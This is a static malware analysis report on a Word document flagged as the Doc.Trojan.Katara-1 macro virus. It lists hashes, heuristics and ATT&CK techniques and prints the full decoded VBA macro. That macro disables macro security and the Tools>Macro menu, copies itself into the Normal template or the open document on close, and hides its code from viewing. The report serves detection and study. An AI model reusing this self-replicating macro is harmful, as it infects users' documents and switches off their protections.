Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 633f99fadd8b32f9…

MALICIOUS

Office (OLE)

29.5 KB Created: 2000-03-30 23:19:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 407e76d888e6c7ec918da59e4391de30 SHA-1: 00a08088603e24316b2bfa83dc4a3d502f6ba6f3 SHA-256: 633f99fadd8b32f931f210546cb851c26565b44b3522c2da9c9123de7359385a
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains VBA macros that attempt to disable macro security warnings and modify the Normal template. This suggests an attempt to establish persistence for malicious code execution. The specific VBA code aims to ensure that the macro runs and potentially modifies the Normal template, which could lead to further malicious activity upon subsequent document openings.

Heuristics 2

  • ClamAV: Doc.Trojan.Katara-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Katara-1
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1014 bytes
SHA-256: 3011a0b3cec5707dd72876e02019595fff370fb4772d4115493b1d2f319ea674
Detection
ClamAV: Doc.Trojan.Katara-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
CommandBars("Tools").Controls("Macro").Enabled = False
Application.EnableCancelKey = wCancelDisabled
Application.DisplayStatusBar = False
Options.SaveNormalPrompt = False
Options.VirusProtection = False
Aloha = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 18)
If ThisDocument = NormalTemplate Then Set Target = ActiveDocument Else Set Target = NormalTemplate
Set Host = Target.VBProject.VBComponents.Item(1).CodeModule
Host.DeleteLines 1, Host.CountOfLines
Host.AddFromString Aloha
If Target = ActiveDocument Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
MsgBox "ClassModule ZG012700", 0, "BSL4"
End Sub
Sub ViewVBCode()
MsgBox "Cannot export module class", 16
End Sub